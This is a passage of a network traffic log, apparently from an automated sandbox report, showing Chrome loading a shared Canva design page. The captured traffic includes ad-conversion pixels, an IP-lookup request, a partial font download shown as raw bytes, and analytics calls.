                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC733INData Raw: 32 66 35 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 32 30 36 38 36 38 33 35 39 37 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c
                                                                                                                                                                                                                                                    Data Ascii: 2f5event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC31INData Raw: 74 72 69 62 75 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: tribution_reporting":true}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC714INData Raw: 32 63 33 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 32 30 36 38 36 38 33 35 39 37 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c 31 6c 31 3b 75 61 61 3d 78 38 36 3b 75 61 62 3d 36 34 3b 75 61 66
                                                                                                                                                                                                                                                    Data Ascii: 2c3event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uaf
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC1408INData Raw: 35 38 34 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 61 64 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 63 6f 6e 76 65 72 73 69 6f 6e 2f 38 30 34 37 35 37 30 37 39 2f 3f 72 61 6e 64 6f 6d 3d 38 33 30 32 32 36 36 35 35 26 66 73 74 3d 31 37 33 34 36 34 33 36 35 37 34 37 32 26 63 76 3d 31 30 26 66 6d 74 3d 33 26 6c 61 62 65 6c 3d 59 61 78 4b 43 4b 54 4a 6c 59 77 59 45 4e 65 38 33 76 38 43 26 62 67 3d 66 66 66 66 66 66 26 67 75 69 64 3d 4f 4e 26 75 5f 77 3d 31 32 38 30 26 75 5f 68 3d 31 30 32 34 26 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33
                                                                                                                                                                                                                                                    Data Ascii: 584event: messagedata: {"send_pixel":["https://www.googleadservices.com/pagead/conversion/804757079/?random=830226655&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z98483
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC11INData Raw: 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: :true}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    67192.168.2.449820104.26.12.205443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC349OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC430INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:38 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 21
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a508c737cf3-EWR
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1857&rtt_var=714&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1512953&cwnd=218&unsent_bytes=0&cid=528d5def13e5cfc8&ts=459&x=0"
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                    Data Ascii: {"ip":"8.46.123.189"}


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    68192.168.2.44982113.226.2.3443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC361OUTGET /pixel/config/1721.json HTTP/1.1
                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 02:58:15 GMT
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                    Last-Modified: Mon, 22 Jul 2024 02:40:56 GMT
                                                                                                                                                                                                                                                    ETag: "b4f9f0dd587c5abe6708f44a6e11a53f"
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: M9mCnq1eLFymQr3gKnRqRiqpIYrp9XbS
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 ab5a0b129a46042ccb6b286f29e7940c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Dhb9iycSaFqVGUDL3CbO5caHwPseeWo5VovRxtA_LCdWauuDjG-XWQ==
                                                                                                                                                                                                                                                    Age: 66564
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC354INData Raw: 7b 22 70 69 78 65 6c 4a 77 74 22 3a 20 22 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 4a 39 2e 65 79 4a 7a 64 57 49 69 4f 69 4a 77 61 58 68 6c 62 43 42 6a 62 32 35 6d 61 57 63 69 4c 43 4a 75 59 57 31 6c 49 6a 6f 69 51 32 46 75 64 6d 45 67 53 57 35 6a 4c 69 49 73 49 6d 6c 7a 63 79 49 36 49 6d 31 6c 64 47 46 6b 59 58 52 68 49 47 6c 75 59 79 34 69 4c 43 4a 68 64 57 51 69 4f 69 49 78 4e 7a 49 78 49 69 77 69 5a 58 68 77 49 6a 6f 78 4e 7a 59 33 4d 54 45 35 4e 44 41 77 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 6a 45 78 4d 7a 63 78 4d 44 59 73 49 6d 35 69 5a 69 49 36 4d 54 63 78 4f 54 63 33 4d 6a 49 77 4d 43 77 69 59 32 39 73 62 47 56 6a 64 45 6c 75 63 32 6c 6e 61 48 52 7a 49 6a 6f 77 4c 43 4a 77 59 57 4e 72
                                                                                                                                                                                                                                                    Data Ascii: {"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    69192.168.2.449822104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:38 UTC710OUTGET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Range: bytes=187599-194187
                                                                                                                                                                                                                                                    If-Range: "654ba7fa32ccfd8c24e11f29b7156a34"
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1281INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:39 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 6589
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Range: bytes 187599-194187/194188
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a548a97c463-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1764971
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "654ba7fa32ccfd8c24e11f29b7156a34"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:38 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:05 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: byhTNi18i6PM1HLlAcI2MglY5O3OdMD4fE6B6rgOt4kY02Yrb+/GWDcdgD3e3zDW75oJxNVfNNk=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: FYPHXPBW3FEP3H18
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: a7U_7Jx2xEmFYTgvPDOeb4VpAX2RwGex
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC791INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 61 34 79 71 67 66 65 62 5f 2e 75 2e 6b 4f 76 6d 39 4f 2e 50 4a 32 4c 5a 71 5a 50 61 67 38 4e 49 70 61 32 30 78 43 31 6d 34 46 73 2d 31 37 33 34 36 34 33 36 35 38 2d 31 2e 30 2e 31 2e 31 2d 7a 6e 6f 72 69 4e 42 38 38 50 61 4d 72 63 6b 45 4f 30 59 79 4f 6d 42 32 76 75 38 4d 79 71 56 51 4f 6f 6f 57 52 39 54 36 41 4a 33 6e 75 59 37 4a 6c 61 58 6a 62 33 52 51 43 5a 72 41 79 6c 58 62 33 4b 34 45 77 36 75 37 77 5f 37 5a 67 58 30 73 32 63 75 71 6e 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 38 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=a4yqgfeb_.u.kOvm9O.PJ2LZqZPag8NIpa20xC1m4Fs-1734643658-1.0.1.1-znoriNB88PaMrckEO0YyOmB2vu8MyqVQOooWR9T6AJ3nuY7JlaXjb3RQCZrAylXb3K4Ew6u7w_7ZgX0s2cuqng; path=/; expires=Thu, 19-Dec-24 21:57:38 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC666INData Raw: ae de ad b7 2e d7 48 b2 74 d9 4e b7 95 25 ae 02 03 49 b6 8b 3f e9 bf ee 6e d5 0f da 66 9a bc ac ce fe d9 73 d5 f3 35 17 a2 d4 52 a4 63 69 c5 e0 f1 4a 36 36 db a3 f6 9a 9b 72 52 95 ed 3a 13 2f 3d 83 19 97 99 ab 12 8d fa 2e 6f a7 a2 68 42 fc 21 0a cf 22 c4 18 6e 56 0a ac 2a 27 0f a7 86 3b 0f bb 36 c0 4f 25 18 57 f7 27 d5 65 75 15 53 7f d5 fd bd 96 62 af 9f 6e a3 a5 a2 a6 0f 2e 7e 05 35 3f 80 e0 8d 9d fc ef b1 e5 44 08 87 a3 f7 5b 5e 1c fe e5 8e 9d 70 35 34 b5 b4 75 9a f7 d3 d3 37 30 e4 39 35 c2 00 df 2a 9f 0d 45 62 42 42 12 13 02 c6 9f 5e cb 15 26 4a ca 2a aa 6a ea 1a 9a 5a da 3a ba 7a d6 27 c0 5f 37 71 7b 06 43 ec 56 0c 8e f8 61 08 a0 9f 9d c5 e1 09 44 12 f9 ec a2 3d 87 67 33 59 6c 0e 97 77 3b 10 da ab 97 34 06 6f aa f1 c8 38 d5 78 66 6e 67 ea 90 dd 54 50
                                                                                                                                                                                                                                                    Data Ascii: .HtN%I?nfs5RciJ66rR:/=.ohB!"nV*';6O%W'euSbn.~5?D[^p54u7095*EbBB^&J*jZ:z'_7q{CVaD=g3Ylw;4o8xfngTP
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1369INData Raw: 60 08 14 06 47 20 51 68 0c 16 87 27 10 49 64 0a 95 46 67 30 59 6c 0e 97 c7 17 08 45 62 89 54 26 37 34 32 36 31 35 33 b7 b0 04 00 41 60 08 14 06 47 20 51 68 4c 30 72 60 71 78 02 91 44 a6 50 69 74 06 93 c5 e6 70 79 7c 81 50 24 96 48 0d 7a ff fb 8e 4a ad d1 ea f4 06 a3 89 a9 99 b9 85 a5 95 b5 8d ad 9d bd 83 23 04 0a 83 23 90 28 34 06 8b c3 13 88 24 32 85 4a a3 33 98 2c 36 87 cb e3 0b 84 22 b1 44 2a 93 2b 94 80 0a 54 6b b4 3a bd c1 88 05 51 92 15 55 d3 0d 93 50 c6 b3 5e a5 d0 00 99 42 a5 a5 a3 47 06 46 26 66 16 56 db 71 9f 3c 3f 08 a3 6d 9c a4 59 5e 94 b8 aa 09 6d 5a 06 5d cf c5 4e 0e 6a 9c f6 da cc 87 e5 b8 9e ce 97 e7 52 b9 52 ad d5 1b cd 56 bb d3 ed f5 07 00 08 c1 08 8a e1 04 49 09 f8 ba fa f7 ea fa bd 50 be f7 6f 92 75 3d 3f 08 a3 38 49 b3 7c 38 1a 4f a6
                                                                                                                                                                                                                                                    Data Ascii: `G Qh'IdFg0YlEbT&7426153A`G QhL0r`qxDPitpy|P$HzJ##(4$2J3,6"D*+Tk:QUP^BGF&fVq<?mY^mZ]NjRRVIPou=?8I|8O
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1369INData Raw: 53 33 73 0b 4b 2b 6b 1b 5b 3b 7b 07 47 08 14 06 47 20 51 68 0c 16 87 27 10 49 64 0a 95 46 67 30 59 6c 0e 97 c7 17 08 45 62 89 34 cc 75 40 71 7f 40 05 aa 35 5a 9a e1 d3 82 05 51 92 15 55 d3 0d 93 50 66 6d 4e 0b 0c 17 ad 07 89 3b b4 29 1c 93 b7 57 dc e9 11 72 45 5c 86 2b 46 10 93 20 49 c9 50 e4 14 94 54 d4 34 b4 74 08 c4 c3 98 48 87 7f 0a e7 e4 e2 e6 e1 e5 53 a2 94 5f 40 50 48 58 44 54 4c 5c 99 72 15 2a 25 24 95 94 55 54 d5 d4 db 0d 9f ee 01 00 08 02 43 a0 30 38 02 89 42 63 b0 38 3c 81 48 22 53 a8 34 cc 61 1d 71 d8 49 39 3c ff b1 44 2a 93 1b 1a 19 9b 98 9a 99 5b 58 02 80 20 30 04 0a 83 23 90 a8 3a ef 59 58 1c de 2a 88 01 ca f8 1a 9d c1 64 b1 39 5c 9e cf 7b 50 28 fa af af 12 a9 4c ae 50 aa d4 1a ad 4e 6f 30 9a 98 9a 99 5b 58 5a 59 db d8 da d9 3b 38 42 a0 30
                                                                                                                                                                                                                                                    Data Ascii: S3sK+k[;{GG Qh'IdFg0YlEb4u@q@5ZQUPfmN;)WrE\+F IPT4tHS_@PHXDTL\r*%$UTC08Bc8<H"S4aqI9<D*[X 0#:YX*d9\{P(LPNo0[XZY;8B0
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1369INData Raw: 38 02 dd 12 25 68 da 3c 66 5f 77 ff ad 7f 13 21 5e 4b fb 35 ae b6 87 42 c8 ed 2d ba f6 fa de b5 0f 72 44 da dc 06 82 43 aa 64 21 6f 2c 17 5e da bc 2c 2c bb bc 89 81 63 b4 07 10 43 01 da 6d 82 91 ac cb 2b 95 b6 2e 53 3b 4f 69 73 dc 07 0f a0 b4 b1 4c 48 9e 39 2e 1e 00 30 6e de 0a b0 98 b4 09 f1 f4 44 fc 19 9b 7b fd 88 0d fb 0c bf aa 09 02 0c fb 18 f6 79 da 57 eb 78 7e e0 d4 4b 33 f6 bc f9 9d db d6 d2 42 18 e1 33 fc aa 26 14 b1 61 1f 9d 9f 25 d5 a0 b5 69 29 ad bd bf 42 90 eb 6d c9 95 02 af c0 b3 64 a2 8c 6d d6 8c 9f 2f 75 ca e3 1c 69 db fb d6 a6 45 7c 6d 3a a4 36 81 15 54 9f 15 24 a5 55 a7 96 3d 4d 4b 8b f3 c3 6c 98 2f 8f 5e 2e a7 e4 81 7c a0 1c a8 45 fb d4 0a f3 ea 4f 83 40 34 56 73 57 7e 83 a3 66 cf 81 7e 60 1c 94 df 3d 0b 42 6a 04 1c 81 46 e0 11 64 8d 7e
                                                                                                                                                                                                                                                    Data Ascii: 8%h<f_w!^K5B-rDCd!o,^,,cCm+.S;OisLH9.0nD{yWx~K3B3&a%i)Bmdm/uiE|m:6T$U=MKl/^.|EO@4VsW~f~`=BjFd~
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1369INData Raw: 2a 6d b2 55 80 08 13 ca b8 d4 36 af 06 10 61 42 19 17 52 69 63 5d 5e 1d 20 c2 84 32 2e a4 d2 26 db 00 88 30 a1 8c 0b a9 b4 b1 2e af 09 10 61 42 19 17 52 69 63 5d 5e 0b 20 c2 84 32 2e a4 d2 c6 ba bc 36 40 84 09 e3 42 2a 6d ac cb eb 00 44 98 30 2e a4 d2 c6 ba bc 2e 40 84 19 17 52 69 eb f2 7a 00 11 26 94 71 21 95 36 d6 e5 f5 11 26 8c 0b a9 b4 b1 f3 4f 09 f6 02 40 44 99 90 d6 8d 77 cf ec 9d 8e 6c bd ab b4 e7 1d de df be 89 c2 bf 7f 7e fd 6d ee f7 9f ac f7 ae 7e c0 ea 1f 65 fb 59 fe a2 77 ca 42 b7 df 18 70 79 eb d0 07 10 61 42 19 17 52 69 63 dd 78 27 56 80 08 13 ca b8 75 79 b3 a1 f0 9f b8 00 80 08 13 ca b8 90 4a 1b eb f2 8a 00 11 26 94 71 21 95 36 d6 e5 95 00 22 4c 28 e3 42 2a 6d ac cb 2b 03 44 98 50 c6 85 54 da 58 97 57 01 88 30 a1 8c 0b a9 b4 b1 2e af 0a 10
                                                                                                                                                                                                                                                    Data Ascii: *mU6aBRic]^ 2.&0.aBRic]^ 2.6@B*mD0..@Riz&q!6&O@Dwl~m~eYwBpyaBRicx'VuyJ&q!6"L(B*m+DPTXW0.
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC447INData Raw: 65 f9 6b 8a 65 7d a5 a5 52 fa 6f 45 fe f5 d1 ef 5d 7b b6 28 7f cc 5f 6f 2f e9 2d e9 2f 19 2a c9 2d 51 74 ee c1 be a2 e1 82 bc 02 5a da 0d 83 45 30 da 81 f4 7f a4 20 3d bf a9 78 6a 62 29 2f 28 8f 8c e6 55 f7 f5 6a 23 f9 7c 32 9c 9d 97 4d 26 b2 6b d0 9e ce e7 92 a1 4c 98 c8 a8 a4 fd f2 40 3a d1 9e e8 4d 1f 4f 1f 29 e2 a1 a8 59 96 c5 73 b1 37 0d c7 45 70 ef 8e 69 ea 3d db 27 59 4a a7 69 1f ed 17 0e 08 47 e4 cc fe b6 10 4c 4a c1 d0 97 52 0a 24 83 81 30 11 18 47 fb fe 6e 7e 2f 9f de be 63 44 1d ba 0d 6e f5 58 6a 79 f5 cc a6 7a 95 af a7 f6 8e 1f 56 2f 2f 1f ab 6e e4 3b 84 9c b3 23 22 47 fd 14 2d a3 e7 bb ec 8e c3 eb cb 57 d5 ce d6 ed f6 ba 3a c6 5a 6d e9 08 43 da 41 54 e3 29 d6 10 34 d0 66 5a 8b 2f c5 37 62 76 4a 5f 5f c8 0e 2e 4c 1f 37 b4 c8 bc 6e a2 e5 c5 22
                                                                                                                                                                                                                                                    Data Ascii: eke}RoE]{(_o/-/*-QtZE0 =xjb)/(Uj#|2M&kL@:MO)Ys7Epi='YJiGLJR$0Gn~/cDnXjyzV//n;#"G-W:ZmCAT)4fZ/7bvJ__.L7n"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    70192.168.2.449826216.239.34.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC2204OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514863&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custo [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
